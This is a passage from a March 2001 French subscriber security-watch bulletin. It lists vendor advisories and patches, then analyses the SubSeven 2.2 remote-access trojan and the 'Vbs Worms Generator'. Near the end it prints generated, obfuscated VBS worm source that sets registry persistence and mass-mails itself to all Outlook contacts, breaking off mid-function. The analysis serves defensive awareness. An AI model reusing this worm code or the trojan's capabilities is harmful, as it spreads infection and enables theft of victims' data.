Le CIAC a repris, sous la référence L-062, le bulletin Microsoft MS01-017 concernant l'émission par 'VeriSign' de
faux certificats 'Microsoft'.
http://ciac.llnl.gov/ciac/bulletins/l-062.shtml
Reprise de l'avis Microsoft MS01-012
Le CIAC a repris, sous la référence L-050, l'avis Microsoft MS01-012 concernant une vulnérabilité affectant Outlook
et Outlook Express.
http://www.ciac.org/ciac/bulletins/l-050.shtml
Reprise de l'avis Microsoft MS01-013
Le CIAC a repris, sous la référence L-051, l'avis Microsoft MS01-013 concernant une vulnérabilité affectant 'Event
Viewer' sous Windows 2000.
http://ciac.llnl.gov/ciac/bulletins/l-051.shtml
Reprise de l'avis CISCO 'ios-snmp-ilmi-vuln-pub'
Le CIAC a repris, sous la référence L-052, l'avis CISCO 'ios-snmp-ilmi-vuln-pub' concernant une vulnérabilité sur
'Cisco IOS' permettant de modifier certains objets 'SNMP' via un nom de communauté 'ILMI' non documenté.
http://ciac.llnl.gov/ciac/bulletins/l-052.shtml
Reprise de l'avis Cisco 'ios-tcp-isn-random-pub'
Le CIAC a repris, sous la référence L-053, l'avis Cisco 'ios-tcp-isn-random-pub' concernant la prédiction des
numéros de séquence TCP sur 'Cisco IOS'.
http://www.ciac.org/ciac/bulletins/l-053.shtml
Reprise de l'avis Microsoft MS01-014
Le CIAC a repris, sous la référence L-054, l'avis Microsoft MS01-014 concernant une vulnérabilité dans 'IIS 5.0' et
'Exchange 2000'
http://www.ciac.org/ciac/bulletins/l-054.shtml
Reprise de l'avis Symantec 'pcAnywhere' 9.x et 10.x
Le CIAC a repris, sous la référence L-055, l'avis Symantec concernant un débordement de buffer dans 'pcAnywhere'
9.x et 10.x.
http://www.ciac.org/ciac/bulletins/l-055.shtml
Reprise de l'avis Microsoft MS01-011
Le CIAC a repris, sous la référence L-049, l'avis Microsoft MS01-011 concernant une vulnérabilité sur les
contrôleurs de domaines Windows 2000 Server.
http://www.ciac.org/ciac/bulletins/l-049.shtml
Reprise de l'avis MIT Kerberos 'krb4tkt'
Le CIAC a repris, sous la référence L-057, l'avis MIT concernant une vulnérabilité dans 'Kerberos 4' et versions
dérivées.
http://ciac.llnl.gov/ciac/bulletins/l-057.shtml
Reprise de l'avis Hewlett-Packard HPSBUX0103-145
Le CIAC a repris, sous la référence L-058, l'avis Hewlett-Packard HPSBUX0103-145 concernant une vulnérabilité
dans 'asecure'.
http://ciac.llnl.gov/ciac/bulletins/l-058.shtml
Reprise de l'avis Microsoft MS01-016
Le CIAC a repris, sous la référence L-059, l'avis Microsoft MS01-016 concernant une vulnérabilité sur 'IIS 5.0'
http://ciac.llnl.gov/ciac/bulletins/l-059.shtml
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 35/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
COMPAQ
Disponibilité des correctifs pour 'named'
Compaq publie plusieurs correctifs contre la vulnérabilité affectant 'named' (bind) ayant fait l'objet du bulletin CERT
(CA-2001-02). Les correctifs sont à destination des plate-formes suivantes : Tru64 UNIX Version 4.0D, 4.0F, 4.0G,
5.0, 5.0A et 5.1.
http://ftp.support.compaq.com/patches/.new/security.shtml
FREEBSD
Disponibilité de plusieurs correctifs
FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
icecast
FreeBSD-SA-01:23
interbase
FreeBSD-SA-01:26
cfengine
FreeBSD-SA-01:27
timed
FreeBSD-SA-01:28
rwhod
FreeBSD-SA-01:29
http://www.linuxsecurity.com/advisories/
HP
Révision de l'avis HPSBUX0012-135 au sujet de 'kermit'
HP apporte une révision au bulletin HPSBUX0012-135. De nouveaux correctifs sont proposés contre le déni de
service affectant le logiciel de communication 'kermit' sur HP-UX.
Version 11.00 : PHCO_22665
10.20 : PHCO_23319
10.10 : PHCO_23320
10.01 : PHCO_23321.
http://europe-support.external.hp.com
LOTUS/IBM
Note d'information sur la vulnérabilité 'Lotus Notes'
Lotus publie une 'FAQ' au sujet de la vulnérabilité affectant les formulaires 'Lotus Notes'. Cette note permet de
contourner le problème sans pour autant éliminer la vulnérabilité.
http://support.lotus.com/sims2.nsf/eb5fbc0ab175cf0885256560005206cf/89e023ae7ee59e5d852569f90059fd5e?OpenDocument
LINUX DEBIAN
Disponibilité de nombreux correctifs
Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
mgetty
DSA-011-2
proftpd
DSA-029-2
sudo
DSA-031-3
proftpd
DSA-032-2
analog
DSA-033-1
ePerl
DSA-034-1
man2html
DSA-035-1
mc
DSA-036-1
athena
DSA-037-1
sgml-tools
DSA-038-1
glibc
DSA-039-1
slrn
DSA-040-1
joe
DSA-041-1
gnuserv,xemacs DSA-042-1
zope
DSA-043-1
mailx
DSA-044-1
http://lists.debian.org/debian-security-announce-01
LINUX MANDRAKE
Disponibilité de nombreux correctifs
Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
sudo
MDKSA-2001:024-1
7.1 / 7.2 / CS1.0.1
zope
MDKSA-2001:025
7.1 / 7.2 / CS1.0.1
joe
MDKSA-2001:026
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
ePerl
MDKSA-2001:027
7.1 / 7.2 / CS1.0.1
slrn
MDKSA-2001:028
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
mesa
MDKSA-2001:029
7.2
sgml-tools
MDKSA-2001:030-1
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
mutt
MDKSA-2001:031
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
licq
MDKSA-2001:032
7.1 / 7.2 / CS1.0.1
openssh
MDKSA-2001:033
7.1 / 7.2 / CS1.0.1
timed
MDKSA-2001:034
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
http://www.linux-mandrake.com/en/security/2001
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 36/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
LINUX REDHAT
Disponibilité de nombreux correctifs
RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
analog
RHSA-2001:017-03
WS2.0
zope
RHSA-2001:021-06
6.2 / 7.0
licq
RHSA-2001:022-01
6.2 / 7.0
joe
RHSA-2001:024-03
5.2 / 6.2 / 7.0
sgml-tools
RHSA-2001:027-02
5.2 / 6.2 / 7.0
slrn
RHSA-2001:028-02
6.2 / 7.0
mutt
RHSA-2001:029-02
5.2 / 6.2 / 7.0
http://www.linuxsecurity.com/advisories/
Disponibilité de nouveaux paquetages 'rpm'
De nouveaux paquetages 'rpm' sont disponibles pour les distributions Linux Red Hat 5.2, 6.2 et 7.0 (architectures
alpha, i386 et sparc). Il existe en effet des problèmes de compatibilité entre les bases de données au format 'db1'
et 'db3' ainsi qu'au niveau du compilateur. Cependant il est possible de rencontrer des problèmes lors de
l'installation de nouveaux paquetages 'rpm' si aucune mise à jour n'est effectuée. Cela équivaudrait à laisser le
système dans une configuration non sécurisée. (voir aussi 'http://www.redhat.com/support/errata/RHEA-2001015.html')
http://www.redhat.com/support/errata/RHSA-2001-016.html
LINUX SuSE
Disponibilité des correctifs pour 'imap'
SuSE [SuSE-SA:2001:06] annonce la disponibilité des correctifs pour 'imap'. En effet, les distributions Linux
comportant un démon 'imapd' vulnérable pouvaient mener un utilisateur distant à obtenir un interpréteur de
commandes sous leur propre identité. Un tel accès n'est pas toujours autorisé. Par exemple, dans le cas de
fournisseurs d'accès Internet proposant un service de messagerie, cette vulnérabilité peut se révéler critique.
http://lists.suse.com/archives/suse-security-announce/2001-Mar/0003.html
Disponibilité des correctifs pour 'in.ftp' et 'timed'
SuSE [SuSE-SA:2001:07] annonce la disponibilité des correctif pour 'in.ftp'
et 'timed' (bulletin 431 du
13/03/2001). Ils corrigents deux vulnérabilités qui permettait l'exécution de code à distance et de provoquer un
déni de service.
http://lists.suse.com/archives/suse-security-announce/2001-Mar/0004.html
Arrêt du support des versions SuSE 6.0, 6.1 et 6.2
SuSE annonce l'arrêt du support des distributions SuSE-Linux versions 6.0, 6.1 et 6.2. Cet arrêt, effectif depuis le
19 mars 2001, intervient cinq semaines après la distribution de la version 7.1. Les versions supportées sont donc
les suivantes : 6.3, 6.4, 7.0 et 7.1.
http://lists.suse.com/archives/suse-security-announce/2001-Feb/0002.html
NetBSD
Disponibilité de nombreux correctifs
NetBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:.
USER-LDT
NetBSD-SA2001-001
i386
ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/
PGPi
Disponibilité de la version PGP 2.6.3(i)
La version PGP2.6.3(i) vient d'être rendue disponible. Elle intègre notamment un correctif contre l'attaque
développée par les chercheurs de la société tchèque ICZ. Cette mise à jour confirme la réalité de l'attaque décrite
comme cela avait été annoncé dans un rapport écrit dans un premier temps en Tchèque et disponible depuis peu en
Anglais. La version PGP 7.0.3 est vulnérable (cette version a été utilisée par la société ICZ dans le cadre d'une
démonstration). Les autres versions affectées ne sont pas encore toutes connues, les auteurs de l'attaque précisant
qu'il est de la responsabilité des éditeurs de vérifier la vulnérabilité de leurs produits.
ftp://ftp.iks-jena.de/mitarb/lutz/crypt/software/pgp/pgp263in/
http://www.icz.cz/en/pdf/openPGP_attack_ENGvktr.pdfhttp://www.icz.cz/en/onas/ohlasy.html
http://www.icz.cz/pdf/pgp/OpenPGP_Attack_ENGfinal.ppt
TIS
Correctifs pour Gauntlet 5.5
TIS publie deux correctifs 'cluster' (PatchLevel 11) pour Gauntlet 5.5. 'cluster.HPUX.patch' 'cluster.SOLARIS.patch'
Ils résolvent des problèmes liés à la gestion des délais et de terminaison des processus dans HTTP, FTP et PLUG.
ftp://ftp.tis.com/gauntlet/patches/5.5/
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 37/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
VIRUS
Infection par les 'vCards'
Suite à la faille découverte dans les applications telles que Microsoft Outlook, utilisant les 'vCards' , NAI/McAFEE
nous informe de la possibilité de recevoir des 'vCards' mal formées exploitant cette vulnérabilité. Ainsi il est
recommandé de ne pas ouvrir ces fichiers, reconnaissables par leur extension '.vcf'. La méthode de propagation
constitue une nouvelle voie de contamination, même s'il ne s'agit pas, à proprement parler, de virus.
http://vil.nai.com/villib/dispvirus.asp?virus_k=99020
CODES D'EXPLOITATION
Les codes d'exploitation des vulnérabilités suivantes ont fait l'objet d'une large diffusion:
ATSTAKE
Détail et code d'exploitation via les 'vCards'
@Stake publie un code d'exploitation ainsi que le détail de la vulnérabilité affectant Microsoft Outlook lors de
l'utilisation de 'vCards' mal formées .
http://www.atstake.com/research/advisories/2001/index.html#022301-1
BULLETINS ET NOTES
Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les
éditeurs:
AusCERT
Reprise de l'avis NIPC [00-060]
L'AusCERT a repris, sous la référence AL-2001.02, l'avis NIPC [00-060] au sujet des nombreuses attaques contre
des sites de e-commerce. Les environnements Microsoft étaient mis en cause dans ce dernier avis.
ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.02
AXENT
Mise à jour de 'NetRecon 3.0' (SU12)
La mise à jour de 'NetRecon 3.0' (SU12) permet maintenant de vérifier les récentes vulnérabilités découvertes dans
'BIND' et 'SSH'. De plus amples détails sont fournis dans la note de mise à jour.
http://www2.axent.com/swat/index.cfm?Doc=2001_02_27
CERT
Emission de faux certificats 'Microsoft Corporation'
Le CERT publie, sous la référence CA-2001-04, son propre bulletin qui vient compléter l'avis Microsoft MS01-017 au
sujet de l'émission de faux certificats 'Microsoft Corporation'. Il référence pour consultation le site 'VeriSign'
http://www.verisign.com/developer/notice/authenticode/index.html ainsi que la liste mise à jour des certificats
révoqués http://crl.verisign.com/Class3SoftwarePublishers.crl Le bulletin est aussi disponible via FedCIRC sous la
référence FA-2001-04 http://www2.fedcirc.gov/advisories/FA-2001-04.html
http://www.cert.org/advisories/CA-2001-04.html
Le ver 'Hybris' véhiculé par les 'open mail relays'
Dans sa note d'informations IN-2001-02, le CERT nous informe que le ver 'Hybris' doit sa récente réapparition à
l'utilisation abusive des relais de courriers électroniques. Il est possible que les serveurs de mails d'une entreprise
soient en 'open relay' sans que celle-ci en ait connaissance. L'impact direct est l'utilisation de la bande passante par
par un tiers ainsi que le 'black-listage' qui peut nuire à l'image de marque de l'entreprise.
http://www.cert.org/incident_notes/IN-2001-02.html
ISS
Disponibilité de la mise à jour NS MU 2.2
La mise à jour corrigeant la faille de sécurité pouvant être exploitée dans ISS RealSecure Network Sensor via l'outil
'stick' est disponible.
http://www.iss.net/db_data/xpu/RS.phphttp://www.iss.net/db_data/xpu/RSNS%20MU%202.2.php
Mise à jour 4.8 pour 'Internet Scanner'
La mise à jour 4.8 pour 'Internet Scanner' inclut la vérification de 19 nouvelles vulnérabilités dont 'LPRng' utilisée
par le virus 'Ramen'.
http://www.iss.net/db_data/xpu/IS4.8.php
Mise à jour pour 'Internet Scanner'
ISS a publié la mise à jour X-Press Update 4.7 pour son scanner de vulnérabilités 'Internet Scanner'. Cette mise à
jour intègre 25 nouveaux tests dont plusieurs portes dérobées ainsi que les récentes vulnérabilités affectant
DNS/BIND et WatchGuard SOHO.
http://www.iss.net/db_data/xpu/IS4.7.php
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 38/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
NIPC
Vulnérabilité des systèmes de détection d'intrusions
Dans son bulletin 01-004, le NIPC informe les utilisateurs de systèmes de détection d'intrusions (IDS) que ceux-ci
sont vulnérables à des attaques de type 'false positive', qui consiste à générer un grand nombre d'attaques
mineures dans le but de surcharger l'IDS afin de pouvoir réellement attaquer ce dernier. Cette note est à mettre en
relation avec l'alerte 'ISS' au sujet de l'outil d'attaque surnommé 'stick'.
http://www.nipc.gov/warnings/assessments/2001/01-004.htm
SYMANTEC
Notification de virus et de signatures via 'SMS'
La société Symantec, spécialisée dans les anti-virus, propose à ses clients 'Platinum' (et bientôt 'Gold') des EtatsUnis et d'Europe un service de notification d'alertes via les messages 'SMS' (Short Message Service). Ces messages,
à destination des téléphones mobiles, alerteront les clients de l'apparition virus ainsi que de la disponibilité des
signatures associées.
http://www.cnn.com/2001/TECH/internet/03/01/symantec.SMS.idg/index.html
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 39/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
ATTAQUES
OUTILS
SUBSEVEN V2.2 Description
Proxy
Socks
Parmi tous les chevaux de Troie ayant fait l'objet d'une campagne médiatique, tels BO, BO2K,
Socket23 ou encore Master Paradise, SubSeven est probablement le seul à avoir subit autant
d'évolutions et à être resté aussi longtemps en tête du hit-parade des outils de 'hacking'. Notons que le
site WEB 'officiel' annonce 2.3 millions de visites depuis le 7 mars 1999, date de publication de la
première version, chiffre qu'il n'y a probablement pas lieu de mettre en doute.
SubSeven reste à ce jour, l'outil de prise de contrôle à distance (ou RAT Remote Access Tools) offrant la plus
grande palette de fonctions.
Le principe fonctionnement de SubSeven2.2 est schématiquement rappelé sur le synoptique suivant:
1. L'utilitaire 'EditServer' permet de générer un Poste
Server.exe
Préparation
exécutable contenant un serveur SubSeven
Paramètres:
- Installation
autonome et pré-configuré.
EditServer
- Accès Réseau
EditServer
- Notification
2. Le lancement de cet exécutable installe le
- ...
serveur sur le machine cible en utilisant l'une
Cible.exe
Cible.exe
des 7 méthodes proposées dans l'option
Redémarrage
Cible.exe
Cible.exe
'Startup Method' de l'utilitaire EditServer.
WEB
Update
PlugIns
3. Le serveur notifie son démarrage et transmet
les paramètres de connexion sur les canaux
Subseven.cgi
Subseven.cgi
actifs parmi les 5 canaux définis via l'option
Notifications
'Notification' de l'utilitaire EditServer.
Serveur
Serveur
Notons la présence d'une option de Poste
Console
notification directe à destination d'un service
Paramètres:
Sin.exe
Sin.exe
- N° de port
statique, dit SIN, défini par un couple
CIBLE
Notifications
adresse IP/Numéro de port TCP. Les autres
Directe
IRC/ICQ/MAIL
mécanismes utilisent sur un canal indirect
IRC/ICQ/MAIL
S
Do
offert par les services ICQ, IRC, Mail ou
Commandes
Sub7.exe
Sub7.exe
encore WEB via l'appel d'un CGI-BIN dédié.
4. L'utilisateur peut alors prendre le contrôle du
système sur lequel un serveur est actif par le
biais
d'une
connexion
TCP
chiffrée
CIBLES
Indirectes
éventuellement établie sur un tunnel SOCKS.
La version 2.2 est distribuée sous la forme d'un paquetage de 2.9Mo dénommé 'ss22.zip' et destiné à être
décompressé dans le répertoire de travail de SubSeven. Ce paquetage contient 5 répertoires, quelques fichiers de
configuration et les 4 exécutables suivants:
- EditServer.exe, l'utilitaire permettant de générer un serveur SubSeven autonome, configuré en fonction des
besoins de l'utilisateur et lié à un ou plusieurs fichiers. Lors de son exécution, le fichier généré peut ainsi
automatiquement extraire puis éventuellement exécuter les fichiers liés. Cette technique permet d'éviter d'avoir à
recourir à un 'binder' ou à un 'wrapper' externe pour insérer le serveur (la charge) dans un autre exécutable (le
cheval de Troie).
- Serveur.exe, le modèle de serveur (ou STUB) utilisé par EditServer pour générer le serveur définitif. Le très
faible encombrement de ce STUB - 55Ko compressé par l'utilitaire UPX - facilite son intégration dans un programme
tiers et sa transmission par un support limité en volume tel que la messagerie.
- Sub7.exe, le programme graphique permettant de rechercher et de prendre le contrôle des systèmes sur lesquels
le serveur SubSeven est actif.
- Sin.exe, un programme de notification minimaliste (Static Ip Notifier) destiné à être exécuté sur le poste de
contrôle et permettant d'être informé en temps réel de l'état des serveurs installés sur les cibles lorsque ceux-ci ont
été générés avec l'option de notification correspondante. Ce programme s'installe dans la barre d'outil et permet
d'initialiser le client Sub7 d'un simple clic sur l'icône correspondant à un serveur actif.
© 2001 APOGEE Communications
SubSeven, conçu comme un programme modulaire et évolutif, fait appel à des
fonctionnalités contenues dans des modules - ou PlugIns - chargés à la volée depuis la
console ou à partir d'un site externe référencé par une URL. En pratique, ces modules
prennent la forme de librairies dynamiques et sont sauvegardés dans le répertoire
d'installation du serveur SubSeven.
La distribution par défaut contient les 13 modules suivant aisément identifiables car sauvegardés sous le nom original:
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 40/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
- s7advanced.dll 'Advanced'
- s7capture.dll
'Fun Manager'/'WebCam'
- s7fun1.dll
'Fun manager'
- s7fun2.dll
'Fun other'
- s7keys.dll
'Keys/Messages'
- s7moreinfo.dll
'Connection'/'MorePCInfo'
- s7password.dll 'Advanced'/'Passwords'
- s7scanner.dll
'Connection'/'Scanner'/'Remote'
- s7sniffer.dll
'Advanced'/'packet sniffer'
- s7takeover.dll
'Keys/messages'/'ICQTakeover'
- icqpwsteal.dll
'Advanced/Passwords'/'IcQPassword'
- matrix.dll
'Realistic Matrix'
- zpacket.vxd
packet32.dll
'Advanced'/'packet sniffer'.
Nota: La chaîne "Packet VxD for Microsoft
Windows 95" contenue dans le fichier
'zpacket.vxd' peut expliquer les
dysfonctionnements constatés sous NT !
La distribution de base de SubSeven propose ainsi quelques 41 fonctions permettant l'acquisition et la manipulations
des ressources du système cible dont en particulier: (le symbole désigne ici une fonctionnalité apparue avec la version 2.2)
- l'identification du système cible,
le sondage déporté de services TCP/IP,
- l'enregistrement des séquences de touches,
- la génération de faux messages systèmes,
- l'interception des échanges chat ICQ, MSN, AIM et YAHOO,
- le transfert de données via un mini-serveur ftp intégré,
- la recherche de fichiers sur le serveur,
l'acquisition et le transfert en UDP des paquet réseaux,
- l'acquisition des mots de passe,ICQ, RAS, AIM et autres,
- un éditeur de registry distant,
l'accès à un explorateur de réseau distant,
- l'accès à un gestionnaire de processus distant,
- l'accès à un gestionnaire de fichier,
- l'accès à un gestionnaire de fenêtre,
l'accès au gestionnaire d'impression,
- l'accès au presse-papier,
- un redirecteur d'application et de services autorisant le rebond,
un netstat distant,
- et enfin, la manipulation de diverses ressources matérielles et
logicielles dont la souris, l'écran, la carte son, la Webcam, le
clavier, le navigateur web, …
Le serveur peut être configuré pour retransmettre les données collectées en temps différé vers une adresse de
messagerie (cas de mots de passe et des séquences de touches) ou en temps réel vers une adresse IP et numéro de
port UDP (cas des paquets réseaux acquis par le 'sniffer'). Deux options de paramétrage permettent d'accroître la
furtivité du serveur: le tirage aléatoire du numéro de port TCP utilisé - celui-ci est transmis sur les canaux de
notification sélectionnés - et la modification du nom du fichier contenant le serveur lors de chaque réinitialisation du
système hôte.
Notons que la fonctionnalité 'IrcBot' - permettant au serveur de s'auto-attacher à un canal IRC et de se comporter
comme un robot (bot) - semble avoir disparue interdisant le pilotage du serveur via IRC. L'auteur de SubSeven
annonce cependant qu'une nouvelle version devrait voir le jour sous peu qui corrigera divers problèmes et intégrera
l'ensemble des plugins des versions précédentes mais aussi un client LINUX.
Les tests que nous avons pu mener sur cette version prouvent que la notoriété de SubSeven ne s'éteindra pas de
sitôt malgré les quelques dysfonctionnements constatés en environnement NT. A ce propos, bien que le serveur de la
version 2.2 soit annoncé compatible Windows NT et 2000 contrairement aux versions précédentes, de nombreuses
fonctions - trop proches du matériels ou sécurisées - restent inopérantes: sniffer, process manager, text2speech, …
A n'en pas douter, la compatibilité Windows NT et 2000 représente à ce jour la plus grande menace.
Bien entendu, cet outil peut faire l'objet de tests sous réserve de respecter les règles élémentaires de sécurité en
installant celui-ci dans un environnement autonome, non connecté aux réseaux de l'entreprise. Un conseil: l'option
ONLINE passée en argument de l'exécutable contenant le serveur permet d'initialiser celui-ci en l'absence de
connexion au réseau. Il est alors possible de tester SubSeven sur un poste isolé en utilisant l'adresse locale 127.0.0.1.
Pour en savoir plus, le lecteur se reportera à la FAQ proposée par le site officiel de SubSeven mais surtout au(x)
remarquable(s) guide(s) disponible(s) sur le site 'Dark-Creation'.
Le site TLSecurity sur lequel peut aussi être téléchargé SubSeven2.2 propose aussi une page détaillant plusieurs
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 41/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
techniques de détection et d'éradication pouvant être exploitées avec succès en cas de suspicion d'infection, ou
d'infection avérée. Notons qu'outre la présence des 'plugins' dans le répertoire système, SubSeven laisse une trace
sous la forme de fichiers temporaires ayant un nom aléatoire au format 7.3 constitué de caractères alphabétiques:
vfklmgb.yyc, gttgawe.yyc, ...
Complément d'information
http://www.sub7files.com/download/index.shtml
http://www.dark-creation.net/azzazzin/subseven/newwindow.htm
http://www.sub7files.com/faq/general.shtm
http://subseven.slak.org
VBS WORM GENERATOR Description
L'époque où le simple fait d'annoncer l'existence d'un nouveau virus était un véritable événement faisant la Une de la
presse médiatique est révolue. Désormais, pour avoir une chance de connaître la gloire dans un monde où quelques
dizaines de nouveaux virus sont découverts chaque semaine, un virus doit impérativement respecter certaines règles
techniques mais aussi 'commerciales' dont notamment:
1. Porter un nom facile à mémoriser: tout le monde se souvient des Stone, Tequila, IloveYou ou
AnnaKournikova mais qui se souvient encore des Melissa, BubbleBoy, Kak, CAP, Filer, 1800, et autres virus
anonymes ayant pourtant eu, pour certains, une capacité de frappe supérieure,
2. Utiliser un vecteur médiatique: la combinaison Internet (transport) / VBS
(langage) / OutLook (application) est actuellement l'une des valeurs les plus sures
dont l'efficacité est avérée. Ces trois termes agissent dans l'esprit du public comme
précurseurs d'une catastrophe similaire à celle provoquée par la (fausse)
'Référence', IloveYou,
3. Favoriser la propagation: au risque d'être plus rapidement découvert, un virus s'il
veut être médiatisé devra favoriser sa duplication quitte à ne transporter aucune
charge destructrice, tel Anna Kournikova, ce qui, effet corollaire intéressant, peut
aussi conduire à diminuer la peine encourue par l'auteur dans certains pays.
4. Revendiquer une paternité: toute référence à un virus ayant été médiatisé
simplifiera le travail du journaliste. Ainsi, il sera opportun de revendiquer une
évolution, modification ou appartenance à une 'école' telle que celles de l'Europe
de l'Est: Bulgarie, Russie ou de l'Amérique du Sud: Argentine (dont un
emblème est présenté ci-contre), Brésil.
Les amateurs à la recherche d'une gloire éphémère et facile retrouveront dans le générateur de Virus* 'Vbs Worms
Generator' créé par [K]Alamar - un argentin - tous les ingrédients nécessaires à la réalisation d'un VIRUS
respectant les principes précédemment énoncés.
Le résultat est garanti puisque l'auteur du
fameux ANNA KOURNIKOVA a reconnu
avoir utilisé ce générateur de virus !
L'effet de cette annonce semble avoir été
immédiat car les quelques sites proposant
ce générateur ont été rapidement saturés
de connexions comme l'annonce le
WebMaster de l'un de ces sites:
"During the last three days thousands of
people all around the world have
download the [K]Alamar's worm generator
from __ _____. The server is overloaded
now with the huge amount of requests
and what we should expect ? Yes, the
second wave of the worm. I think it will
be so. It is new situation for me and I ask
myself again and again do the people
think about consequnces of their actions ?
"
Notons à ce propos, que cet utilitaire n'est
qu'un générateur parmi les quelques 54
générateurs disponibles sur un site dédié
dont une copie de la page de présentation
est proposée ci-contre.
Rappelons aussi que l'annonce de la disponibilité du ' Senna Spy Trojan Generator ' (dont l'auteur est Brésilien) en
Juillet 2000, avait aussi provoqué une ruée sur le site 'sennaspy.8m.com' désormais clos.
Nous tenons à préciser que l'objectif de l'analyse qui va suivre n'est pas d'inciter le lecteur à utiliser cet outil mais au
contraire de détailler son fonctionnement pas à pas afin de l'informer en lui évitant des manipulations hasardeuses et
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 42/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
risquées.
Le fonctionnement du 'Vbs Worms Generator' ou 'Vbs WG' mérite d'être présenté
étant donnée son extrême simplicité. La version 2.0 qui date du 9 Mars 2001 est
annoncée comme résultant d'une réécriture complète de la version 1.5 publiée en
Août 2000.
Cette dernière, écrite en VB5, générait un virus à partir de la concaténation et du
paramétrage de fichiers modèles contenant les fonctions VBS d'initialisation,
d'infection des environnements pIrch, mIrc et Outlook et de recopie du virus.
La version 2.0 n'offre 'hélas' plus aucun accès aux sources du code VBS. Notons la
présence dans la distribution d'un fichier d'aide bien documenté mais ne décrivant pas
les modèles de fonctions utilisés.
Une rapide inspection de l'exécutable permet cependant de mettre en évidence le
code VBS source. Celui-ci peut alors être facilement extrait pour analyse détaillée. Il
apparaît que le code VBS utilisé diffère peu de celui de la version précédente.
La génération d'un Virus est effectuée ainsi en moins d'une minute et en 9 étapes détaillées "par l'image" ci-après:
1.
2.
3.
Sélection du mode d'initialisation du
virus une fois installé sur un
système infecté
Paramétrage du nom du virus et
d'informations contextuelles diverse
Paramétrage du sujet et contenu
du mail envoyé à la victime
4.
5.
6.
Sélection des cibles à infecter
7.
Configuration des options
concernant IRC
Définition de la charge
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Sélection des modes de protection
et de dissimulation
Page 43/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
8.
9.
'Signature' d'une décharge de responsabilité
et génération ….
Bien que concis, le code généré est obscurci par l'utilisation d'un technique de modification dynamique du nom des
objets et fonctions ayant pour but de complexifier la détection par un algorithme de recherche de signatures statiques.
Le code produit reste bien moins performant que ceux générés par la version 1.5 (gestion de pIrch) ou utilisés par
Melissa et IloveYou (l'option 'Infect File' n'a pas été activée afin de générer un virus non virulent similaire à 'Anna
Kournikova').
'Vbs.Vbswg.My Own WORM Created By The Security Watcher. 3/14/2001
Set T80563H8 = createobject("scripting.filesystemobject")
GPN44J3E = T80563H8.getspecialfolder(2)
ON693784 = GPN44J3E & "\Vbswg_Worm.jpg.vbs"
Set RNIDQGGT = createobject("wscript.shell")
RNIDQGGT.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & ON693784 & " %"
T80563H8.copyfile wscript.scriptfullname, ON693784
If RNIDQGGT.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\My Own WORM\L3RL1Q6M") <> 1 then
M0L6E463
End if
If RNIDQGGT.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\My Own WORM\CR6S42U9") <> 1 then
Q2O11C14 ""
End if
Function M0L6E463()
Set V1MFJ7RV = CreateObject("Outlook.Application")
If V1MFJ7RV = "Outlook" Then
Set G8T6N4QB = V1MFJ7RV.GetNameSpace("MAPI")
Set D66V4MVA = G8T6N4QB.AddressLists
For Each D33CR984 In D66V4MVA
If D33CR984.AddressEntries.Count <> 0 Then
OT2617EI = D33CR984.AddressEntries.Count
For AEA6513R = 1 To OT2617EI
Set E5TIP237 = V1MFJ7RV.CreateItem(0)
Set F4TST814 = D33CR984.AddressEntries(AEA6513R)
E5TIP237.To = F4TST814.Address
E5TIP237.Subject = "Very Important!"
E5TIP237.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
Execute "set B04B978R=E5TIP237."&Chr(65)&Chr(116)&Chr(116)&Chr(97)&Chr(99)&Chr(104)&Chr(109)&Chr(101)&Chr(110)&Chr(116)&Chr(115)
O4VI6017 = ON693784
E5TIP237.DeleteAfterSubmit = True
B04B978R.Add O4VI6017
If E5TIP237.To <> "" Then
E5TIP237.Send
End If
Next
End If
Next
End If
End function
Function Q2O11C14(T3JO3787)
If T3JO3787 <> "" Then
L2168MPK = RNIDQGGT.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If T80563H8.fileexists("c:\mirc\mirc.ini") Then
